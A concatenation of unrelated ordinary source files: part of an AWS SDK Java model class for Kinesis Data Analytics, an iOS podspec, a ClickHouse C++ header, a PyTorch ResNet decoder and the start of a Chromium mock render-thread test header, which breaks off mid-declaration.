RuntimeEnvironment */ public ApplicationDetail withRuntimeEnvironment(String runtimeEnvironment) { setRuntimeEnvironment(runtimeEnvironment); return this; } /** * <p> * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, <code>FLINK-1_8</code> * , or <code>FLINK-1_11</code>). * </p> * * @param runtimeEnvironment * The runtime environment for the application (<code>SQL-1_0</code>, <code>FLINK-1_6</code>, * <code>FLINK-1_8</code>, or <code>FLINK-1_11</code>). * @return Returns a reference to this object so that method calls can be chained together. * @see RuntimeEnvironment */ public ApplicationDetail withRuntimeEnvironment(RuntimeEnvironment runtimeEnvironment) { this.runtimeEnvironment = runtimeEnvironment.toString(); return this; } /** * <p> * Specifies the IAM role that the application uses to access external resources. * </p> * * @param serviceExecutionRole * Specifies the IAM role that the application uses to access external resources. */ public void setServiceExecutionRole(String serviceExecutionRole) { this.serviceExecutionRole = serviceExecutionRole; } /** * <p> * Specifies the IAM role that the application uses to access external resources. * </p> * * @return Specifies the IAM role that the application uses to access external resources. */ public String getServiceExecutionRole() { return this.serviceExecutionRole; } /** * <p> * Specifies the IAM role that the application uses to access external resources. * </p> * * @param serviceExecutionRole * Specifies the IAM role that the application uses to access external resources. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withServiceExecutionRole(String serviceExecutionRole) { setServiceExecutionRole(serviceExecutionRole); return this; } /** * <p> * The status of the application. * </p> * * @param applicationStatus * The status of the application. * @see ApplicationStatus */ public void setApplicationStatus(String applicationStatus) { this.applicationStatus = applicationStatus; } /** * <p> * The status of the application. * </p> * * @return The status of the application. * @see ApplicationStatus */ public String getApplicationStatus() { return this.applicationStatus; } /** * <p> * The status of the application. * </p> * * @param applicationStatus * The status of the application. * @return Returns a reference to this object so that method calls can be chained together. * @see ApplicationStatus */ public ApplicationDetail withApplicationStatus(String applicationStatus) { setApplicationStatus(applicationStatus); return this; } /** * <p> * The status of the application. * </p> * * @param applicationStatus * The status of the application. * @return Returns a reference to this object so that method calls can be chained together. * @see ApplicationStatus */ public ApplicationDetail withApplicationStatus(ApplicationStatus applicationStatus) { this.applicationStatus = applicationStatus.toString(); return this; } /** * <p> * Provides the current application version. Kinesis Data Analytics updates the <code>ApplicationVersionId</code> * each time you update the application. * </p> * * @param applicationVersionId * Provides the current application version. Kinesis Data Analytics updates the * <code>ApplicationVersionId</code> each time you update the application. */ public void setApplicationVersionId(Long applicationVersionId) { this.applicationVersionId = applicationVersionId; } /** * <p> * Provides the current application version. Kinesis Data Analytics updates the <code>ApplicationVersionId</code> * each time you update the application. * </p> * * @return Provides the current application version. Kinesis Data Analytics updates the * <code>ApplicationVersionId</code> each time you update the application. */ public Long getApplicationVersionId() { return this.applicationVersionId; } /** * <p> * Provides the current application version. Kinesis Data Analytics updates the <code>ApplicationVersionId</code> * each time you update the application. * </p> * * @param applicationVersionId * Provides the current application version. Kinesis Data Analytics updates the * <code>ApplicationVersionId</code> each time you update the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationVersionId(Long applicationVersionId) { setApplicationVersionId(applicationVersionId); return this; } /** * <p> * The current timestamp when the application was created. * </p> * * @param createTimestamp * The current timestamp when the application was created. */ public void setCreateTimestamp(java.util.Date createTimestamp) { this.createTimestamp = createTimestamp; } /** * <p> * The current timestamp when the application was created. * </p> * * @return The current timestamp when the application was created. */ public java.util.Date getCreateTimestamp() { return this.createTimestamp; } /** * <p> * The current timestamp when the application was created. * </p> * * @param createTimestamp * The current timestamp when the application was created. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withCreateTimestamp(java.util.Date createTimestamp) { setCreateTimestamp(createTimestamp); return this; } /** * <p> * The current timestamp when the application was last updated. * </p> * * @param lastUpdateTimestamp * The current timestamp when the application was last updated. */ public void setLastUpdateTimestamp(java.util.Date lastUpdateTimestamp) { this.lastUpdateTimestamp = lastUpdateTimestamp; } /** * <p> * The current timestamp when the application was last updated. * </p> * * @return The current timestamp when the application was last updated. */ public java.util.Date getLastUpdateTimestamp() { return this.lastUpdateTimestamp; } /** * <p> * The current timestamp when the application was last updated. * </p> * * @param lastUpdateTimestamp * The current timestamp when the application was last updated. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withLastUpdateTimestamp(java.util.Date lastUpdateTimestamp) { setLastUpdateTimestamp(lastUpdateTimestamp); return this; } /** * <p> * Describes details about the application code and starting parameters for a Kinesis Data Analytics application. * </p> * * @param applicationConfigurationDescription * Describes details about the application code and starting parameters for a Kinesis Data Analytics * application. */ public void setApplicationConfigurationDescription(ApplicationConfigurationDescription applicationConfigurationDescription) { this.applicationConfigurationDescription = applicationConfigurationDescription; } /** * <p> * Describes details about the application code and starting parameters for a Kinesis Data Analytics application. * </p> * * @return Describes details about the application code and starting parameters for a Kinesis Data Analytics * application. */ public ApplicationConfigurationDescription getApplicationConfigurationDescription() { return this.applicationConfigurationDescription; } /** * <p> * Describes details about the application code and starting parameters for a Kinesis Data Analytics application. * </p> * * @param applicationConfigurationDescription * Describes details about the application code and starting parameters for a Kinesis Data Analytics * application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationConfigurationDescription(ApplicationConfigurationDescription applicationConfigurationDescription) { setApplicationConfigurationDescription(applicationConfigurationDescription); return this; } /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> * * @return Describes the application Amazon CloudWatch logging options. */ public java.util.List<CloudWatchLoggingOptionDescription> getCloudWatchLoggingOptionDescriptions() { return cloudWatchLoggingOptionDescriptions; } /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> * * @param cloudWatchLoggingOptionDescriptions * Describes the application Amazon CloudWatch logging options. */ public void setCloudWatchLoggingOptionDescriptions(java.util.Collection<CloudWatchLoggingOptionDescription> cloudWatchLoggingOptionDescriptions) { if (cloudWatchLoggingOptionDescriptions == null) { this.cloudWatchLoggingOptionDescriptions = null; return; } this.cloudWatchLoggingOptionDescriptions = new java.util.ArrayList<CloudWatchLoggingOptionDescription>(cloudWatchLoggingOptionDescriptions); } /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> * <p> * <b>NOTE:</b> This method appends the values to the existing list (if any). Use * {@link #setCloudWatchLoggingOptionDescriptions(java.util.Collection)} or * {@link #withCloudWatchLoggingOptionDescriptions(java.util.Collection)} if you want to override the existing * values. * </p> * * @param cloudWatchLoggingOptionDescriptions * Describes the application Amazon CloudWatch logging options. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withCloudWatchLoggingOptionDescriptions(CloudWatchLoggingOptionDescription... cloudWatchLoggingOptionDescriptions) { if (this.cloudWatchLoggingOptionDescriptions == null) { setCloudWatchLoggingOptionDescriptions(new java.util.ArrayList<CloudWatchLoggingOptionDescription>(cloudWatchLoggingOptionDescriptions.length)); } for (CloudWatchLoggingOptionDescription ele : cloudWatchLoggingOptionDescriptions) { this.cloudWatchLoggingOptionDescriptions.add(ele); } return this; } /** * <p> * Describes the application Amazon CloudWatch logging options. * </p> * * @param cloudWatchLoggingOptionDescriptions * Describes the application Amazon CloudWatch logging options. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withCloudWatchLoggingOptionDescriptions( java.util.Collection<CloudWatchLoggingOptionDescription> cloudWatchLoggingOptionDescriptions) { setCloudWatchLoggingOptionDescriptions(cloudWatchLoggingOptionDescriptions); return this; } /** * <p> * The details of the maintenance configuration for the application. * </p> * * @param applicationMaintenanceConfigurationDescription * The details of the maintenance configuration for the application. */ public void setApplicationMaintenanceConfigurationDescription(ApplicationMaintenanceConfigurationDescription applicationMaintenanceConfigurationDescription) { this.applicationMaintenanceConfigurationDescription = applicationMaintenanceConfigurationDescription; } /** * <p> * The details of the maintenance configuration for the application. * </p> * * @return The details of the maintenance configuration for the application. */ public ApplicationMaintenanceConfigurationDescription getApplicationMaintenanceConfigurationDescription() { return this.applicationMaintenanceConfigurationDescription; } /** * <p> * The details of the maintenance configuration for the application. * </p> * * @param applicationMaintenanceConfigurationDescription * The details of the maintenance configuration for the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationMaintenanceConfigurationDescription( ApplicationMaintenanceConfigurationDescription applicationMaintenanceConfigurationDescription) { setApplicationMaintenanceConfigurationDescription(applicationMaintenanceConfigurationDescription); return this; } /** * <p> * The previous application version before the latest application update. <a>RollbackApplication</a> reverts the * application to this version. * </p> * * @param applicationVersionUpdatedFrom * The previous application version before the latest application update. <a>RollbackApplication</a> reverts * the application to this version. */ public void setApplicationVersionUpdatedFrom(Long applicationVersionUpdatedFrom) { this.applicationVersionUpdatedFrom = applicationVersionUpdatedFrom; } /** * <p> * The previous application version before the latest application update. <a>RollbackApplication</a> reverts the * application to this version. * </p> * * @return The previous application version before the latest application update. <a>RollbackApplication</a> reverts * the application to this version. */ public Long getApplicationVersionUpdatedFrom() { return this.applicationVersionUpdatedFrom; } /** * <p> * The previous application version before the latest application update. <a>RollbackApplication</a> reverts the * application to this version. * </p> * * @param applicationVersionUpdatedFrom * The previous application version before the latest application update. <a>RollbackApplication</a> reverts * the application to this version. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationVersionUpdatedFrom(Long applicationVersionUpdatedFrom) { setApplicationVersionUpdatedFrom(applicationVersionUpdatedFrom); return this; } /** * <p> * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * </p> * * @param applicationVersionRolledBackFrom * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. */ public void setApplicationVersionRolledBackFrom(Long applicationVersionRolledBackFrom) { this.applicationVersionRolledBackFrom = applicationVersionRolledBackFrom; } /** * <p> * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * </p> * * @return If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. */ public Long getApplicationVersionRolledBackFrom() { return this.applicationVersionRolledBackFrom; } /** * <p> * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * </p> * * @param applicationVersionRolledBackFrom * If you reverted the application using <a>RollbackApplication</a>, the application version when * <code>RollbackApplication</code> was called. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationVersionRolledBackFrom(Long applicationVersionRolledBackFrom) { setApplicationVersionRolledBackFrom(applicationVersionRolledBackFrom); return this; } /** * <p> * A value you use to implement strong concurrency for application updates. * </p> * * @param conditionalToken * A value you use to implement strong concurrency for application updates. */ public void setConditionalToken(String conditionalToken) { this.conditionalToken = conditionalToken; } /** * <p> * A value you use to implement strong concurrency for application updates. * </p> * * @return A value you use to implement strong concurrency for application updates. */ public String getConditionalToken() { return this.conditionalToken; } /** * <p> * A value you use to implement strong concurrency for application updates. * </p> * * @param conditionalToken * A value you use to implement strong concurrency for application updates. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withConditionalToken(String conditionalToken) { setConditionalToken(conditionalToken); return this; } /** * <p> * The version to which you want to roll back the application. * </p> * * @param applicationVersionRolledBackTo * The version to which you want to roll back the application. */ public void setApplicationVersionRolledBackTo(Long applicationVersionRolledBackTo) { this.applicationVersionRolledBackTo = applicationVersionRolledBackTo; } /** * <p> * The version to which you want to roll back the application. * </p> * * @return The version to which you want to roll back the application. */ public Long getApplicationVersionRolledBackTo() { return this.applicationVersionRolledBackTo; } /** * <p> * The version to which you want to roll back the application. * </p> * * @param applicationVersionRolledBackTo * The version to which you want to roll back the application. * @return Returns a reference to this object so that method calls can be chained together. */ public ApplicationDetail withApplicationVersionRolledBackTo(Long applicationVersionRolledBackTo) { setApplicationVersionRolledBackTo(applicationVersionRolledBackTo); return this; } /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> * * @param applicationMode * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. * However, for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * @see ApplicationMode */ public void setApplicationMode(String applicationMode) { this.applicationMode = applicationMode; } /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> * * @return To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. * However, for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * @see ApplicationMode */ public String getApplicationMode() { return this.applicationMode; } /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> * * @param applicationMode * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. * However, for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * @return Returns a reference to this object so that method calls can be chained together. * @see ApplicationMode */ public ApplicationDetail withApplicationMode(String applicationMode) { setApplicationMode(applicationMode); return this; } /** * <p> * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. However, * for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * </p> * * @param applicationMode * To create a Kinesis Data Analytics Studio notebook, you must set the mode to <code>INTERACTIVE</code>. * However, for a Kinesis Data Analytics for Apache Flink application, the mode is optional. * @return Returns a reference to this object so that method calls can be chained together. * @see ApplicationMode */ public ApplicationDetail withApplicationMode(ApplicationMode applicationMode) { this.applicationMode = applicationMode.toString(); return this; } /** * Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be * redacted from this string using a placeholder value. * * @return A string representation of this object. * * @see java.lang.Object#toString() */ @Override public String toString() { StringBuilder sb = new StringBuilder(); sb.append("{"); if (getApplicationARN() != null) sb.append("ApplicationARN: ").append(getApplicationARN()).append(","); if (getApplicationDescription() != null) sb.append("ApplicationDescription: ").append(getApplicationDescription()).append(","); if (getApplicationName() != null) sb.append("ApplicationName: ").append(getApplicationName()).append(","); if (getRuntimeEnvironment() != null) sb.append("RuntimeEnvironment: ").append(getRuntimeEnvironment()).append(","); if (getServiceExecutionRole() != null) sb.append("ServiceExecutionRole: ").append(getServiceExecutionRole()).append(","); if (getApplicationStatus() != null) sb.append("ApplicationStatus: ").append(getApplicationStatus()).append(","); if (getApplicationVersionId() != null) sb.append("ApplicationVersionId: ").append(getApplicationVersionId()).append(","); if (getCreateTimestamp() != null) sb.append("CreateTimestamp: ").append(getCreateTimestamp()).append(","); if (getLastUpdateTimestamp() != null) sb.append("LastUpdateTimestamp: ").append(getLastUpdateTimestamp()).append(","); if (getApplicationConfigurationDescription() != null) sb.append("ApplicationConfigurationDescription: ").append(getApplicationConfigurationDescription()).append(","); if (getCloudWatchLoggingOptionDescriptions() != null) sb.append("CloudWatchLoggingOptionDescriptions: ").append(getCloudWatchLoggingOptionDescriptions()).append(","); if (getApplicationMaintenanceConfigurationDescription() != null) sb.append("ApplicationMaintenanceConfigurationDescription: ").append(getApplicationMaintenanceConfigurationDescription()).append(","); if (getApplicationVersionUpdatedFrom() != null) sb.append("ApplicationVersionUpdatedFrom: ").append(getApplicationVersionUpdatedFrom()).append(","); if (getApplicationVersionRolledBackFrom() != null) sb.append("ApplicationVersionRolledBackFrom: ").append(getApplicationVersionRolledBackFrom()).append(","); if (getConditionalToken() != null) sb.append("ConditionalToken: ").append(getConditionalToken()).append(","); if (getApplicationVersionRolledBackTo() != null) sb.append("ApplicationVersionRolledBackTo: ").append(getApplicationVersionRolledBackTo()).append(","); if (getApplicationMode() != null) sb.append("ApplicationMode: ").append(getApplicationMode()); sb.append("}"); return sb.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (obj instanceof ApplicationDetail == false) return false; ApplicationDetail other = (ApplicationDetail) obj; if (other.getApplicationARN() == null ^ this.getApplicationARN() == null) return false; if (other.getApplicationARN() != null && other.getApplicationARN().equals(this.getApplicationARN()) == false) return false; if (other.getApplicationDescription() == null ^ this.getApplicationDescription() == null) return false; if (other.getApplicationDescription() != null && other.getApplicationDescription().equals(this.getApplicationDescription()) == false) return false; if (other.getApplicationName() == null ^ this.getApplicationName() == null) return false; if (other.getApplicationName() != null && other.getApplicationName().equals(this.getApplicationName()) == false) return false; if (other.getRuntimeEnvironment() == null ^ this.getRuntimeEnvironment() == null) return false; if (other.getRuntimeEnvironment() != null && other.getRuntimeEnvironment().equals(this.getRuntimeEnvironment()) == false) return false; if (other.getServiceExecutionRole() == null ^ this.getServiceExecutionRole() == null) return false; if (other.getServiceExecutionRole() != null && other.getServiceExecutionRole().equals(this.getServiceExecutionRole()) == false) return false; if (other.getApplicationStatus() == null ^ this.getApplicationStatus() == null) return false; if (other.getApplicationStatus() != null && other.getApplicationStatus().equals(this.getApplicationStatus()) == false) return false; if (other.getApplicationVersionId() == null ^ this.getApplicationVersionId() == null) return false; if (other.getApplicationVersionId() != null && other.getApplicationVersionId().equals(this.getApplicationVersionId()) == false) return false; if (other.getCreateTimestamp() == null ^ this.getCreateTimestamp() == null) return false; if (other.getCreateTimestamp() != null && other.getCreateTimestamp().equals(this.getCreateTimestamp()) == false) return false; if (other.getLastUpdateTimestamp() == null ^ this.getLastUpdateTimestamp() == null) return false; if (other.getLastUpdateTimestamp() != null && other.getLastUpdateTimestamp().equals(this.getLastUpdateTimestamp()) == false) return false; if (other.getApplicationConfigurationDescription() == null ^ this.getApplicationConfigurationDescription() == null) return false; if (other.getApplicationConfigurationDescription() != null && other.getApplicationConfigurationDescription().equals(this.getApplicationConfigurationDescription()) == false) return false; if (other.getCloudWatchLoggingOptionDescriptions() == null ^ this.getCloudWatchLoggingOptionDescriptions() == null) return false; if (other.getCloudWatchLoggingOptionDescriptions() != null && other.getCloudWatchLoggingOptionDescriptions().equals(this.getCloudWatchLoggingOptionDescriptions()) == false) return false; if (other.getApplicationMaintenanceConfigurationDescription() == null ^ this.getApplicationMaintenanceConfigurationDescription() == null) return false; if (other.getApplicationMaintenanceConfigurationDescription() != null && other.getApplicationMaintenanceConfigurationDescription().equals(this.getApplicationMaintenanceConfigurationDescription()) == false) return false; if (other.getApplicationVersionUpdatedFrom() == null ^ this.getApplicationVersionUpdatedFrom() == null) return false; if (other.getApplicationVersionUpdatedFrom() != null && other.getApplicationVersionUpdatedFrom().equals(this.getApplicationVersionUpdatedFrom()) == false) return false; if (other.getApplicationVersionRolledBackFrom() == null ^ this.getApplicationVersionRolledBackFrom() == null) return false; if (other.getApplicationVersionRolledBackFrom() != null && other.getApplicationVersionRolledBackFrom().equals(this.getApplicationVersionRolledBackFrom()) == false) return false; if (other.getConditionalToken() == null ^ this.getConditionalToken() == null) return false; if (other.getConditionalToken() != null && other.getConditionalToken().equals(this.getConditionalToken()) == false) return false; if (other.getApplicationVersionRolledBackTo() == null ^ this.getApplicationVersionRolledBackTo() == null) return false; if (other.getApplicationVersionRolledBackTo() != null && other.getApplicationVersionRolledBackTo().equals(this.getApplicationVersionRolledBackTo()) == false) return false; if (other.getApplicationMode() == null ^ this.getApplicationMode() == null) return false; if (other.getApplicationMode() != null && other.getApplicationMode().equals(this.getApplicationMode()) == false) return false; return true; } @Override public int hashCode() { final int prime = 31; int hashCode = 1; hashCode = prime * hashCode + ((getApplicationARN() == null) ? 0 : getApplicationARN().hashCode()); hashCode = prime * hashCode + ((getApplicationDescription() == null) ? 0 : getApplicationDescription().hashCode()); hashCode = prime * hashCode + ((getApplicationName() == null) ? 0 : getApplicationName().hashCode()); hashCode = prime * hashCode + ((getRuntimeEnvironment() == null) ? 0 : getRuntimeEnvironment().hashCode()); hashCode = prime * hashCode + ((getServiceExecutionRole() == null) ? 0 : getServiceExecutionRole().hashCode()); hashCode = prime * hashCode + ((getApplicationStatus() == null) ? 0 : getApplicationStatus().hashCode()); hashCode = prime * hashCode + ((getApplicationVersionId() == null) ? 0 : getApplicationVersionId().hashCode()); hashCode = prime * hashCode + ((getCreateTimestamp() == null) ? 0 : getCreateTimestamp().hashCode()); hashCode = prime * hashCode + ((getLastUpdateTimestamp() == null) ? 0 : getLastUpdateTimestamp().hashCode()); hashCode = prime * hashCode + ((getApplicationConfigurationDescription() == null) ? 0 : getApplicationConfigurationDescription().hashCode()); hashCode = prime * hashCode + ((getCloudWatchLoggingOptionDescriptions() == null) ? 0 : getCloudWatchLoggingOptionDescriptions().hashCode()); hashCode = prime * hashCode + ((getApplicationMaintenanceConfigurationDescription() == null) ? 0 : getApplicationMaintenanceConfigurationDescription().hashCode()); hashCode = prime * hashCode + ((getApplicationVersionUpdatedFrom() == null) ? 0 : getApplicationVersionUpdatedFrom().hashCode()); hashCode = prime * hashCode + ((getApplicationVersionRolledBackFrom() == null) ? 0 : getApplicationVersionRolledBackFrom().hashCode()); hashCode = prime * hashCode + ((getConditionalToken() == null) ? 0 : getConditionalToken().hashCode()); hashCode = prime * hashCode + ((getApplicationVersionRolledBackTo() == null) ? 0 : getApplicationVersionRolledBackTo().hashCode()); hashCode = prime * hashCode + ((getApplicationMode() == null) ? 0 : getApplicationMode().hashCode()); return hashCode; } @Override public ApplicationDetail clone() { try { return (ApplicationDetail) super.clone(); } catch (CloneNotSupportedException e) { throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e); } } @com.amazonaws.annotation.SdkInternalApi @Override public void marshall(ProtocolMarshaller protocolMarshaller) { com.amazonaws.services.kinesisanalyticsv2.model.transform.ApplicationDetailMarshaller.getInstance().marshall(this, protocolMarshaller); } }
14,878
5,169
{ "name": "GSLLivePlayer", "version": "1.1.1", "summary": "GSL LivePlayer", "description": "哥斯拉六路连麦", "homepage": "https://github.com/wangtongvip/GSLLivePlayer/blob/master/README.md", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "wangtong": "<EMAIL>" }, "platforms": { "ios": "9.0" }, "source": { "git": "https://github.com/wangtongvip/GSLLivePlayer.git", "tag": "1.1.1" }, "source_files": [ "GSLLivePlayer/GSLLivePlayerDemo/LiveRoomViewController.{h,m}", "GSLLivePlayer/GSLLivePlayerDemo/LiveControlView.{h,m}", "GSLLivePlayer/GSLLivePlayerDemo/PreviewView.{h,m}", "GSLLivePlayer/GSLLivePlayerDemo/SettingManager.{h,m}" ], "frameworks": "UIKit", "vendored_frameworks": [ "GSLLivePlayerFramework.framework", "TXLiteAVSDK_TRTC.framework", "GSLSignalingCenterFramework.framework" ], "libraries": [ "c++", "resolv" ], "requires_arc": true }
444
15,577
<filename>src/Storages/VirtualColumnUtils.h #pragma once #include <Core/Block.h> #include <Interpreters/Context_fwd.h> #include <Parsers/IAST_fwd.h> #include <Storages/SelectQueryInfo.h> #include <unordered_set> namespace DB { class NamesAndTypesList; namespace VirtualColumnUtils { /// Adds to the select query section `WITH value AS column_name`, and uses func /// to wrap the value (if any) /// /// For example: /// - `WITH 9000 as _port`. /// - `WITH toUInt16(9000) as _port`. void rewriteEntityInAst(ASTPtr ast, const String & column_name, const Field & value, const String & func = ""); /// Prepare `expression_ast` to filter block. Returns true if `expression_ast` is not trimmed, that is, /// `block` provides all needed columns for `expression_ast`, else return false. bool prepareFilterBlockWithQuery(const ASTPtr & query, ContextPtr context, Block block, ASTPtr & expression_ast); /// Leave in the block only the rows that fit under the WHERE clause and the PREWHERE clause of the query. /// Only elements of the outer conjunction are considered, depending only on the columns present in the block. /// If `expression_ast` is passed, use it to filter block. void filterBlockWithQuery(const ASTPtr & query, Block & block, ContextPtr context, ASTPtr expression_ast = {}); /// Extract from the input stream a set of `name` column values template <typename T> auto extractSingleValueFromBlock(const Block & block, const String & name) { std::unordered_set<T> res; const ColumnWithTypeAndName & data = block.getByName(name); size_t rows = block.rows(); for (size_t i = 0; i < rows; ++i) res.insert((*data.column)[i].get<T>()); return res; } } }
530
343
import logging import torch.nn as nn from networks.ops import SpectralNorm def conv5x5(in_planes, out_planes, stride=1, groups=1, dilation=1): """5x5 convolution with padding""" return nn.Conv2d(in_planes, out_planes, kernel_size=5, stride=stride, padding=2, groups=groups, bias=False, dilation=dilation) def conv3x3(in_planes, out_planes, stride=1, groups=1, dilation=1): """3x3 convolution with padding""" return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=dilation, groups=groups, bias=False, dilation=dilation) def conv1x1(in_planes, out_planes, stride=1): """1x1 convolution""" return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False) class BasicBlock(nn.Module): expansion = 1 def __init__(self, inplanes, planes, stride=1, upsample=None, norm_layer=None, large_kernel=False): super(BasicBlock, self).__init__() if norm_layer is None: norm_layer = nn.BatchNorm2d self.stride = stride conv = conv5x5 if large_kernel else conv3x3 # Both self.conv1 and self.downsample layers downsample the input when stride != 1 if self.stride > 1: self.conv1 = SpectralNorm(nn.ConvTranspose2d(inplanes, inplanes, kernel_size=4, stride=2, padding=1, bias=False)) else: self.conv1 = SpectralNorm(conv(inplanes, inplanes)) self.bn1 = norm_layer(inplanes) self.activation = nn.LeakyReLU(0.2, inplace=True) self.conv2 = SpectralNorm(conv(inplanes, planes)) self.bn2 = norm_layer(planes) self.upsample = upsample def forward(self, x): identity = x out = self.conv1(x) out = self.bn1(out) out = self.activation(out) out = self.conv2(out) out = self.bn2(out) if self.upsample is not None: identity = self.upsample(x) out += identity out = self.activation(out) return out class ResNet_D_Dec(nn.Module): def __init__(self, block, layers, norm_layer=None, large_kernel=False, late_downsample=False): super(ResNet_D_Dec, self).__init__() self.logger = logging.getLogger("Logger") if norm_layer is None: norm_layer = nn.BatchNorm2d self._norm_layer = norm_layer self.large_kernel = large_kernel self.kernel_size = 5 if self.large_kernel else 3 self.inplanes = 512 if layers[0] > 0 else 256 self.late_downsample = late_downsample self.midplanes = 64 if late_downsample else 32 self.conv1 = SpectralNorm(nn.ConvTranspose2d(self.midplanes, 32, kernel_size=4, stride=2, padding=1, bias=False)) self.bn1 = norm_layer(32) self.leaky_relu = nn.LeakyReLU(0.2, inplace=True) self.conv2 = nn.Conv2d(32, 1, kernel_size=self.kernel_size, stride=1, padding=self.kernel_size//2) self.upsample = nn.UpsamplingNearest2d(scale_factor=2) self.tanh = nn.Tanh() self.layer1 = self._make_layer(block, 256, layers[0], stride=2) self.layer2 = self._make_layer(block, 128, layers[1], stride=2) self.layer3 = self._make_layer(block, 64, layers[2], stride=2) self.layer4 = self._make_layer(block, self.midplanes, layers[3], stride=2) for m in self.modules(): if isinstance(m, nn.Conv2d): if hasattr(m, "weight_bar"): nn.init.xavier_uniform_(m.weight_bar) else: nn.init.xavier_uniform_(m.weight) elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) # Zero-initialize the last BN in each residual branch, # so that the residual branch starts with zeros, and each residual block behaves like an identity. # This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677 for m in self.modules(): if isinstance(m, BasicBlock): nn.init.constant_(m.bn2.weight, 0) self.logger.debug(self) def _make_layer(self, block, planes, blocks, stride=1): if blocks == 0: return nn.Sequential(nn.Identity()) norm_layer = self._norm_layer upsample = None if stride != 1: upsample = nn.Sequential( nn.UpsamplingNearest2d(scale_factor=2), SpectralNorm(conv1x1(self.inplanes, planes * block.expansion)), norm_layer(planes * block.expansion), ) elif self.inplanes != planes * block.expansion: upsample = nn.Sequential( SpectralNorm(conv1x1(self.inplanes, planes * block.expansion)), norm_layer(planes * block.expansion), ) layers = [block(self.inplanes, planes, stride, upsample, norm_layer, self.large_kernel)] self.inplanes = planes * block.expansion for _ in range(1, blocks): layers.append(block(self.inplanes, planes, norm_layer=norm_layer, large_kernel=self.large_kernel)) return nn.Sequential(*layers) def forward(self, x, mid_fea): x = self.layer1(x) # N x 256 x 32 x 32 x = self.layer2(x) # N x 128 x 64 x 64 x = self.layer3(x) # N x 64 x 128 x 128 x = self.layer4(x) # N x 32 x 256 x 256 x = self.conv1(x) x = self.bn1(x) x = self.leaky_relu(x) x = self.conv2(x) alpha = (self.tanh(x) + 1.0) / 2.0 return alpha, None
2,779
14,668
<gh_stars>1000+ // Copyright (c) 2012 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CONTENT_PUBLIC_TEST_MOCK_RENDER_THREAD_H_ #define CONTENT_PUBLIC_TEST_MOCK_RENDER_THREAD_H_ #include <stddef.h> #include <stdint.h> #include <string> #include "base/observer_list.h" #include "base/task/single_thread_task_runner.h" #include "build/build_config.h" #include "content/public/common/widget_type.h" #include "content/public/renderer/render_thread.h" #include "ipc/ipc_test_sink.h" #include "ipc/message_filter.h" #include "mojo/public/cpp/bindings/pending_receiver.h" #include "third_party/blink/public/mojom/browser_interface_broker.mojom.h" namespace IPC { class MessageFilter; class MessageReplyDeserializer; } namespace content { namespace mojom { class CreateNewWindowParams; class CreateNewWindowReply; class Frame; class RenderMessageFilter; } // This class is a very simple mock of RenderThread. It simulates an IPC channel // which supports the following message: // FrameHostMsg_CreateChildFrame : sync message sent by the renderer. class MockRenderThread : public RenderThread { public: MockRenderThread(); ~MockRenderThread() override; // Provides access to the messages that have been received by this thread. IPC::TestSink& sink() { return sink_; } void SetIOTaskRunner( scoped_refptr<base::SingleThreadTaskRunner> task_runner) { io_task_runner_ = std::move(task_runner); } // RenderThread implementation: bool Send(IPC::Message* msg) override; IPC::SyncChannel* GetChannel() override; std::string GetLocale() override; IPC::SyncMessageFilter* GetSyncMessageFilter() override; scoped_refptr<base::SingleThreadTaskRunner> GetIOTaskRunner() override; void BindHostReceiver(mojo::GenericPendingReceiver receiver) override; void AddRoute(int32_t routing_id, IPC::Listener* listener) override; void AttachTaskRunnerToRoute( int32_t routing_id, scoped_refptr<base::SingleThreadTaskRunner> task_runner) override; void 